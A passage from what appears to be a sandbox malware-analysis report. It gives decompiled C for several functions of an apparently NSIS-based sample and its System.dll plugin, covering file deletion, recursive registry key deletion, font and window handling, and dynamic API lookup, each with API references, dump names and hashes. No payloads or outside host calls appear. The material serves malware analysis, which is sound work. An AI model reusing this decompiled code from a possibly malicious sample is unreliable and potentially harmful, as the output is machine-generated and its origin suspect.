							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 70AC2480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E70AC2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E70AC135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E70AC12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M70AC25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E70AC13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E70AC13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x70ac506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x70ac506c, __eax,  *0x70ac506c, 0, 0);
									goto L27;
								case 4:
									__eax = E70AC12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E70AC13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x70ac506c =  *0x70ac5074 + ( *(__esi + 0x18) - 1) *  *0x70ac506c * 2 + 0x18;
									 *__ebx =  *0x70ac5074 + ( *(__esi + 0x18) - 1) *  *0x70ac506c * 2 + 0x18;
									asm("cdq");
									__eax = E70AC1510(__edx,  *0x70ac5074 + ( *(__esi + 0x18) - 1) *  *0x70ac506c * 2 + 0x18, __edx,  *0x70ac5074 + ( *(__esi + 0x18) - 1) *  *0x70ac506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E70AC12CC(0x70ac5044);
					goto L10;
				}
			}

0x70ac2494
0x70ac2498
0x70ac24a3
0x70ac24a3
0x70ac24aa
0x70ac24af
0x00000000
0x00000000
0x70ac24b3
0x70ac24b6
0x00000000
0x00000000
0x70ac24bb
0x70ac24c6
0x70ac24d6
0x00000000
0x70ac24cd
0x70ac24cf
0x70ac24e5
0x00000000
0x70ac24e5
0x70ac24bd
0x70ac24bd
0x70ac24e6
0x70ac24e6
0x70ac24e8
0x70ac24ec
0x70ac24ec
0x70ac24ef
0x70ac24ef
0x70ac24f7
0x70ac24ff
0x70ac2502
0x70ac25c1
0x70ac25c2
0x70ac25cd
0x70ac25f7
0x70ac25f7
0x70ac25dd
0x70ac25e9
0x70ac25df
0x70ac25df
0x70ac25df
0x00000000
0x70ac2508
0x70ac2508
0x00000000
0x70ac250f
0x00000000
0x00000000
0x70ac2517
0x00000000
0x00000000
0x70ac2525
0x70ac2527
0x00000000
0x00000000
0x70ac2548
0x70ac254e
0x70ac2551
0x70ac2553
0x70ac2563
0x00000000
0x00000000
0x70ac2530
0x70ac2535
0x70ac2538
0x70ac2539
0x00000000
0x00000000
0x70ac256f
0x70ac2575
0x70ac2576
0x70ac2579
0x70ac257a
0x70ac257c
0x00000000
0x00000000
0x70ac2588
0x70ac258b
0x70ac2597
0x70ac2599
0x00000000
0x00000000
0x70ac25a5
0x70ac25b1
0x70ac25b4
0x70ac25b6
0x70ac25b9
0x00000000
0x00000000
0x70ac2508
0x70ac2502
0x70ac24db
0x70ac24e0
0x00000000
0x70ac24e0

APIs

GlobalFree.KERNEL32(00000000), ref: 70AC25C2

Part of subcall function 70AC12CC: lstrcpynW.KERNEL32(00000000,?,70AC137F,00000019,70AC11CA,-000000A0), ref: 70AC12DC

GlobalAlloc.KERNEL32(00000040), ref: 70AC2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70AC2563

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 8291d14b0884104eec379b5bc52a3a985511ae60e4d3f015fcb3d629004d6934
Instruction ID: b83171812922be5f1cf2725fd7649f076d8497f3ba6b1251a2618259f56b5147
Opcode Fuzzy Hash: 8291d14b0884104eec379b5bc52a3a985511ae60e4d3f015fcb3d629004d6934
Instruction Fuzzy Hash: 3641B0B1104309DFD718DF65D940B2F77B8FB88310F22892DF9468A298EB78E545DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 70AC16BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70AC16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x70ac16d7
0x70ac16e3
0x70ac16f0
0x70ac16f7
0x70ac1700
0x70ac170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70AC22D8,?,00000808), ref: 70AC16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70AC22D8,?,00000808), ref: 70AC16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70AC22D8,?,00000808), ref: 70AC16F0
GetProcAddress.KERNEL32(70AC22D8,00000000), ref: 70AC16F7
GlobalFree.KERNEL32(00000000), ref: 70AC1700

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: e2530f249c762afaaa40b535ac3c7dc2b17bf9332e494d9f2b4e7652195af06a
Instruction ID: 1600bba91e3ad0144b718d406364bf99836bd144736e8dc9b6dda3ee5a646617
Opcode Fuzzy Hash: e2530f249c762afaaa40b535ac3c7dc2b17bf9332e494d9f2b4e7652195af06a
Instruction Fuzzy Hash: 73F0F8732461387B962056E78C48D9BBF9DEF8B2F5B220211F728921A0C6A54C0297F5

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
